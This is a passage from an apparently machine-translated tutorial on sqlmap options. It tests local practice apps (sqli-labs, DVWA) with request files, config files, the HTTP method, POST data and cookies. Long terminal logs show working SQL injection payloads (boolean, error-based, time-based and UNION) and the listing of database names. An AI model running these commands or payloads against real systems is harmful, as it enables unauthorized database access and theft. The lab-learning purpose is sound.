[00:25:30] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[00:25:31] [CRITICAL] unable to connect to the target URL
[00:25:31] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[00:25:31] [CRITICAL] unable to connect to the target URL
[00:25:31] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[00:25:31] [CRITICAL] unable to connect to the target URL
[00:25:31] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
there seems to be a continuous problem with connection to the target. Are you sure that you want to continue? [y/N]
[00:25:31] [ERROR] user quit
[*] ending @ 00:25:31 /2020-02-26/
At this point, the time is obviously longer. (3) You can save an HTTP request in a file and use the parameter - r.
And save to target Txt, the content example is as follows:
GET /sqli-labs/Less-2/?id=3 HTTP/1.1 Host: 127.0.0.1 Connection: keep-alive Pragma: no-cache Cache-Control: no-cache Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.116 Safari/537.36 Sec-Fetch-Dest: document Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Accept-Encoding: gzip, deflate, br Accept-Language: zh-CN,zh;q=0.9 Cookie: csrftoken=gdhsRRG8COXmUmcoRBvbc259rYnbPKXFpEiggOHQF9MZxMkmBsX8zavVCyuWB7oF; PHPSESSID=e0c8pbo1jmiji6fjb5gl5e0nug
Test:
python sqlmap.py -r "xxx\target.txt" --banner
___
__H__
___ ___[(]_____ ___ ___ {1.4.2.31#dev}
|_ -| . [.] | .'| . |
|___|_ [(]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all appli
cable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 19:20:12 /2020-02-25/
[19:20:12] [CRITICAL] specified HTTP request file 'xxx\target.txt' does not exist
[*] ending @ 19:20:12 /2020-02-25/
This process is faster because there is a cache. Read the local cache directly. (4) From the configuration file sqlmap Read the target detection in conf, and the parameter is - c.
Test:
python sqlmap.py -c sqlmap.conf
___
__H__
___ ___["]_____ ___ ___ {1.4.2.31#dev}
|_ -| . ["] | .'| . |
|___|_ [,]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[19:27:10] [CRITICAL] missing a mandatory option in the configuration file (direct, url, logFile, bulkFile, googleDork, requestFile or wizard)
Prompt that the parameter is missing. At this time, it is in sqlmap. Under sqlmap directory Add parameters to conf:
# Target URL.
And save the test results again:
___
__H__
___ ___[(]_____ ___ ___ {1.4.2.31#dev}
|_ -| . [)] | .'| . |
|___|_ [(]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all appli
cable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 19:29:50 /2020-02-25/
[19:29:50] [INFO] testing connection to the target URL
[19:29:50] [INFO] checking if the target is protected by some kind of WAF/IPS
[19:29:50] [INFO] testing if the target URL content is stable
[19:29:51] [INFO] target URL content is stable
[19:29:51] [INFO] testing if GET parameter 'id' is dynamic
[19:29:51] [INFO] GET parameter 'id' appears to be dynamic
[19:29:51] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[19:29:51] [INFO] heuristic (XSS) test shows that GET parameter 'id' might be vulnerable to cross-site scripting (XSS) attacks
[19:29:51] [INFO] testing for SQL injection on GET parameter 'id'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n]
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n]
[19:29:56] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[19:29:56] [WARNING] reflective value(s) found and filtering out
[19:29:56] [INFO] GET parameter 'id' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="Your")
[19:29:56] [INFO] testing 'Generic inline queries'
[19:29:56] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[19:29:56] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[19:29:56] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[19:29:56] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[19:29:56] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[19:29:56] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[19:29:56] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[19:29:56] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable
[19:29:56] [INFO] testing 'MySQL inline queries'
[19:29:56] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[19:29:56] [WARNING] time-based comparison requires larger statistical model, please wait............. (done)
[19:29:57] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[19:29:57] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[19:29:57] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[19:29:57] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[19:29:57] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[19:29:57] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[19:30:07] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[19:30:07] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[19:30:07] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[19:30:07] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically e
xtending the range for current UNION query injection technique test
[19:30:07] [INFO] target URL appears to have 3 columns in query
[19:30:07] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 50 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=3 AND 2331=2331
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=3 AND (SELECT 7999 FROM(SELECT COUNT(*),CONCAT(0x7162786a71,(SELECT (ELT(7999=7999,1))),0x7178717671,FLOOR(RAND(0)*2))x FROM INFORMATION_S
CHEMA.PLUGINS GROUP BY x)a)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=3 AND (SELECT 3727 FROM (SELECT(SLEEP(5)))RGAJ)
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=-8029 UNION ALL SELECT NULL,CONCAT(0x7162786a71,0x79644646714470516f6d4342496d65754f547961586b55726f6f6f454e4452467659575362594d58,0x71787
17671),NULL-- -
---
[19:30:15] [INFO] the back-end DBMS is MySQL
[19:30:16] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
back-end DBMS: MySQL >= 5.0
[19:30:16] [INFO] fetched data logged to text files under 'xxxx\sqlmap\output\127.0.0.1'
[*] ending @ 19:30:16 /2020-02-25/
This is the time to probe the target url.
2, sqlmap setting request parameters (Part 1)
There are many methods for HTTP requests, which can carry different parameters in different locations (GET, POST, cookie, user agent, etc.). Often only the request initiated by a specific method with specific parameters in a specific location is a legal and effective request. In addition to specifying the target, the Sqlmap runtime sometimes needs to specify some details of the HTTP request.
1.HTTP method
Generally speaking, Sqlmap can automatically determine whether to use GET method or POST method, but in some cases, it may require rare methods such as PUT. At this time, it is necessary to specify the method with the parameter - method.
Test:
python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-2/?id=3 --banner -v 5 --method='put'
___
__H__
___ ___[']_____ ___ ___ {1.4.2.31#dev}
|_ -| . ['] | .'| . |
|___|_ [.]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all appl
cable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 19:36:18 /2020-02-25/
[19:36:18] [DEBUG] cleaning up configuration parameters
[19:36:18] [DEBUG] setting the HTTP timeout
[19:36:18] [DEBUG] setting the HTTP User-Agent header
[19:36:18] [DEBUG] creating HTTP requests opener object
[19:36:18] [INFO] resuming back-end DBMS 'mysql'
[19:36:18] [INFO] testing connection to the target URL
[19:36:18] [TRAFFIC OUT] HTTP request [#1]:
'PUT' /sqli-labs/Less-2/?id=3 HTTP/1.1
Cache-control: no-cache
User-agent: sqlmap/1.4.2.31#dev (http://sqlmap.org)
Host: 127.0.0.1
Accept: */*
Accept-encoding: gzip,deflate
Connection: close
[19:36:18] [DEBUG] declared web page charset 'utf-8'
[19:36:18] [TRAFFIC IN] HTTP response [#1] (200 OK):
Date: Tue, 25 Feb 2020 11:36:18 GMT
Server: Apache/2.4.39 (Win64) OpenSSL/1.1.1b mod_fcgid/2.3.9a
X-Powered-By: PHP/7.3.4
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
URI: http://127.0.0.1:80/sqli-labs/Less-2/?id=3
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id ('PUT')
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=3 AND 2331=2331
Vector: AND [INFERENCE]
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=3 AND (SELECT 7999 FROM(SELECT COUNT(*),CONCAT(0x7162786a71,(SELECT (ELT(7999=7999,1))),0x7178717671,FLOOR(RAND(0)*2))x FROM INFORMATION_
CHEMA.PLUGINS GROUP BY x)a)
Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA
PLUGINS GROUP BY x)a)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=3 AND (SELECT 3727 FROM (SELECT(SLEEP(5)))RGAJ)
Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=-8029 UNION ALL SELECT NULL,CONCAT(0x7162786a71,0x79644646714470516f6d4342496d65754f547961586b55726f6f6f454e4452467659575362594d58,0x7178
17671),NULL-- -
Vector: UNION ALL SELECT NULL,[QUERY],NULL-- -
---
[19:36:18] [INFO] the back-end DBMS is MySQL
[19:36:18] [INFO] fetching banner
[19:36:18] [DEBUG] resuming configuration option 'string' ('Your')
[19:36:18] [PAYLOAD] -5438 UNION ALL SELECT NULL,CONCAT(0x7162786a71,IFNULL(CAST(VERSION() AS NCHAR),0x20),0x7178717671),NULL-- -
[19:36:18] [TRAFFIC OUT] HTTP request [#2]:
'PUT' /sqli-labs/Less-2/?id=-5438%20UNION%20ALL%20SELECT%20NULL%2CCONCAT%280x7162786a71%2CIFNULL%28CAST%28VERSION%28%29%20AS%20NCHAR%29%2C0x20%29%2C0x717
717671%29%2CNULL--%20- HTTP/1.1
Cache-control: no-cache
User-agent: sqlmap/1.4.2.31#dev (http://sqlmap.org)
Host: 127.0.0.1
Accept: */*
Accept-encoding: gzip,deflate
Connection: close
[19:36:18] [TRAFFIC IN] HTTP response [#2] (200 OK):
Date: Tue, 25 Feb 2020 11:36:18 GMT
Server: Apache/2.4.39 (Win64) OpenSSL/1.1.1b mod_fcgid/2.3.9a
X-Powered-By: PHP/7.3.4
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
URI: http://127.0.0.1:80/sqli-labs/Less-2/?id=-5438%20UNION%20ALL%20SELECT%20NULL%2CCONCAT%280x7162786a71%2CIFNULL%28CAST%28VERSION%28%29%20AS%20NCHAR%29
2C0x20%29%2C0x7178717671%29%2CNULL--%20-
[19:36:18] [DEBUG] performed 1 queries in 0.05 seconds
back-end DBMS: MySQL >= 5.0
banner: '5.7.26'
[19:36:18] [INFO] fetched data logged to text files under 'xxxx\sqlmap\output\127.0.0.1'
[*] ending @ 19:36:18 /2020-02-25/
Obviously, the request method changes from the default method get to put. In most cases, you do not need to specify a request method.
2.sqlmap setting post submission parameters
Parameters: **–data= "xxx"**
By default, the HTTP method used to execute the HTTP request is GET, but it can be implicitly changed to POST by providing the data sent in the POST request. These data are used as parameters for SQL injection detection. Get the parameters to be passed in through the following methods:
The obtained parameters are as follows: uname=admin&passwd=admin&submit=Submit Test:
python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-11/index.php --data="uname=admin&passwd=admin&submit=Submit" --banner
___
__H__
___ ___[,]_____ ___ ___ {1.4.2.31#dev}
|_ -| . ["] | .'| . |
|___|_ [']_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all appli
cable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 20:15:58 /2020-02-25/
[20:15:59] [INFO] testing connection to the target URL
[20:15:59] [INFO] testing if the target URL content is stable
[20:15:59] [INFO] target URL content is stable
[20:15:59] [INFO] testing if POST parameter 'uname' is dynamic
[20:15:59] [INFO] POST parameter 'uname' appears to be dynamic
[20:15:59] [INFO] heuristic (basic) test shows that POST parameter 'uname' might be injectable (possible DBMS: 'MySQL')
[20:15:59] [INFO] heuristic (XSS) test shows that POST parameter 'uname' might be vulnerable to cross-site scripting (XSS) attacks
[20:15:59] [INFO] testing for SQL injection on POST parameter 'uname'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n]
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n]
[20:16:04] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[20:16:04] [WARNING] reflective value(s) found and filtering out
[20:16:04] [INFO] POST parameter 'uname' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="Your")
[20:16:04] [INFO] testing 'Generic inline queries'
[20:16:04] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[20:16:04] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[20:16:04] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[20:16:04] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[20:16:04] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[20:16:04] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[20:16:04] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[20:16:04] [INFO] POST parameter 'uname' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable
[20:16:04] [INFO] testing 'MySQL inline queries'
[20:16:04] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[20:16:04] [WARNING] time-based comparison requires larger statistical model, please wait............. (done)
[20:16:04] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[20:16:04] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[20:16:04] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[20:16:05] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[20:16:05] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[20:16:05] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[20:16:15] [INFO] POST parameter 'uname' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[20:16:15] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[20:16:15] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[20:16:15] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically e
xtending the range for current UNION query injection technique test
[20:16:15] [INFO] target URL appears to have 2 columns in query
[20:16:15] [INFO] POST parameter 'uname' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
POST parameter 'uname' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 48 HTTP(s) requests:
---
Parameter: uname (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: uname=admin' AND 7492=7492 AND 'jXXH'='jXXH&passwd=admin&submit=Submit
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: uname=admin' AND (SELECT 7837 FROM(SELECT COUNT(*),CONCAT(0x717a767a71,(SELECT (ELT(7837=7837,1))),0x717a7a7671,FLOOR(RAND(0)*2))x FROM INFOR
MATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'dtOn'='dtOn&passwd=admin&submit=Submit
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: uname=admin' AND (SELECT 7860 FROM (SELECT(SLEEP(5)))PVMp) AND 'CrTc'='CrTc&passwd=admin&submit=Submit
Type: UNION query
Title: Generic UNION query (NULL) - 2 columns
Payload: uname=-9136' UNION ALL SELECT CONCAT(0x717a767a71,0x725a43566f6467534565694971667541727953454651634263597178416a6871516d64595a6e5052,0x717a7a
7671),NULL-- -&passwd=admin&submit=Submit
---
[20:16:21] [INFO] the back-end DBMS is MySQL
[20:16:21] [INFO] fetching banner
[20:16:21] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
back-end DBMS: MySQL >= 5.0
banner: '5.7.26'
[20:16:21] [INFO] fetched data logged to text files under 'xxxx\sqlmap\output\127.0.0.1'
[*] ending @ 20:16:21 /2020-02-25/
3. Set cookie parameters in sqlmap
Common parameters:
–cookie –cookie-del –load-cookies –drop-set-cookie
Usage scenario 1:
web applications have a cookie based verification process. The page to be tested can only be accessed in the login state. The login state is identified by cookies, that is, log in to the website with cookies. Log in to dvwa and configure as follows:
Get test link Test without cookie s:
python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-11/index.php --data="uname=admin&passwd=admin&submit=Submit" --banner
___
__H__
___ ___[,]_____ ___ ___ {1.4.2.31#dev}
|_ -| . [)] | .'| . |
|___|_ [']_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all appli
cable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 20:32:53 /2020-02-25/
[20:32:54] [INFO] testing connection to the target URL
got a 302 redirect to 'http://127.0.0.1:80/dvwa/login.php'. Do you want to follow? [Y/n]
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=mo0id4fpa3u...k9jc45seke;security=impossible;security=impossible'). Do you
want to use those [Y/n]
[20:33:02] [INFO] checking if the target is protected by some kind of WAF/IPS
[20:33:02] [INFO] testing if the target URL content is stable
[20:33:02] [WARNING] GET parameter 'id' does not appear to be dynamic
[20:33:02] [WARNING] heuristic (basic) test shows that GET parameter 'id' might not be injectable
[20:33:02] [INFO] testing for SQL injection on GET parameter 'id'
[20:33:03] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[20:33:04] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[20:33:04] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[20:33:05] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[20:33:05] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[20:33:05] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[20:33:06] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[20:33:06] [INFO] testing 'Generic inline queries'
[20:33:06] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[20:33:06] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[20:33:07] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[20:33:07] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[20:33:08] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[20:33:08] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)'
[20:33:08] [INFO] testing 'Oracle AND time-based blind'
it is recommended to perform only basic UNION tests if there is not at least one other (potential) technique found. Do you want to reduce the number of re
quests? [Y/n]
[20:33:11] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[20:33:13] [WARNING] GET parameter 'id' does not seem to be injectable
[20:33:13] [CRITICAL] all tested parameters do not appear to be injectable. Try to increase values for '--level'/'--risk' options if you wish to perform m
ore tests. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper
=space2comment') and/or switch '--random-agent'
[*] ending @ 20:33:13 /2020-02-25/
'Submit' It is not an internal or external command, nor is it a runnable program
Or batch file.
Obviously, the expected effect is not achieved, and cookie s need to be added. Obtain cookie s as follows:
security=low; csrftoken=gdhsRRG8COXmUmcoRBvbc259rYnbPKXFpEiggOHQF9MZxMkmBsX8zavVCyuWB7oF; PHPSESSID=e0c8pbo1jmiji6fjb5gl5e0nug
Retest:
python sqlmap.py -u "http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; csrftoken=gdhsRRG8COXmUmcoRBvbc259rYnbPKX FpEiggOHQF9MZxMkmBsX8zavVCyuWB7oF; PHPSESSID=e0c8pbo1jmiji6fjb5gl5e0nug" --banner --dbs
___
__H__
___ ___[)]_____ ___ ___ {1.4.2.31#dev}
|_ -| . [)] | .'| . |
|___|_ [']_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 18:05:46 /2020-02-26/
Cookie parameter 'csrftoken' appears to hold anti-CSRF token. Do you want sqlmap to automatically update it in further requests? [y/N]
[18:05:52] [INFO] testing connection to the target URL
[18:05:52] [INFO] testing if the target URL content is stable
[18:05:52] [INFO] target URL content is stable
[18:05:52] [INFO] testing if GET parameter 'id' is dynamic
[18:05:52] [WARNING] GET parameter 'id' does not appear to be dynamic
[18:05:52] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[18:05:53] [INFO] heuristic (XSS) test shows that GET parameter 'id' might be vulnerable to cross-site scripting (XSS) attacks
[18:05:53] [INFO] testing for SQL injection on GET parameter 'id'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n]
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n]
[18:05:56] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[18:05:56] [WARNING] reflective value(s) found and filtering out
[18:05:57] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[18:05:57] [INFO] testing 'Generic inline queries'
[18:05:57] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[18:05:59] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[18:06:01] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)'
[18:06:03] [INFO] GET parameter 'id' appears to be 'OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)' injectable (with --not-string="Me")
[18:06:03] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[18:06:03] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[18:06:03] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[18:06:03] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[18:06:03] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[18:06:03] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[18:06:03] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[18:06:03] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable
[18:06:03] [INFO] testing 'MySQL inline queries'
[18:06:03] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[18:06:03] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[18:06:03] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[18:06:03] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[18:06:03] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[18:06:03] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[18:06:03] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[18:06:14] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[18:06:14] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[18:06:14] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[18:06:14] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[18:06:14] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[18:06:14] [INFO] target URL appears to have 2 columns in query
[18:06:14] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable
[18:06:14] [WARNING] in OR boolean-based injection cases, please consider usage of switch '--drop-set-cookie' if you experience any problems during data retrieval
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 145 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
Payload: id=1' OR NOT 4485=4485#&Submit=Submit
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1' AND (SELECT 4021 FROM(SELECT COUNT(*),CONCAT(0x7170767871,(SELECT (ELT(4021=4021,1))),0x716a7a6a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- itaf&Submit=Submit
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 5269 FROM (SELECT(SLEEP(5)))UGkv)-- hSLn&Submit=Submit
Type: UNION query
Title: MySQL UNION query (NULL) - 2 columns
Payload: id=1' UNION ALL SELECT CONCAT(0x7170767871,0x77445a5271767a68534a6a4f506b6d7846796151674d745a704549484b614856506754536d726242,0x716a7a6a71),NULL#&Submit=Submit
---
[18:06:28] [INFO] the back-end DBMS is MySQL
[18:06:28] [INFO] fetching banner
[18:06:28] [WARNING] something went wrong with full UNION technique (could be because of limitation on retrieved number of entries)
[18:06:28] [INFO] retrieved: '5.7.26'
[18:06:29] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
back-end DBMS: MySQL >= 5.0
banner: '5.7.26'
[18:06:29] [INFO] fetching database names
[18:06:29] [WARNING] something went wrong with full UNION technique (could be because of limitation on retrieved number of entries). Falling back to partial UNION technique
[18:06:29] [WARNING] the SQL query provided does not return any output
[18:06:29] [INFO] retrieved: 'information_schema'
[18:06:29] [INFO] retrieved: 'challenges'
[18:06:29] [INFO] retrieved: 'demo'
[18:06:29] [INFO] retrieved: 'demo1125'
[18:06:29] [INFO] retrieved: 'demo1204'
[18:06:29] [INFO] retrieved: 'dvwa'
[18:06:29] [INFO] retrieved: 'jingdong'
[18:06:29] [INFO] retrieved: 'mysql'
[18:06:29] [INFO] retrieved: 'performance_schema'
[18:06:29] [INFO] retrieved: 'pythontest'
[18:06:29] [INFO] retrieved: 'security'
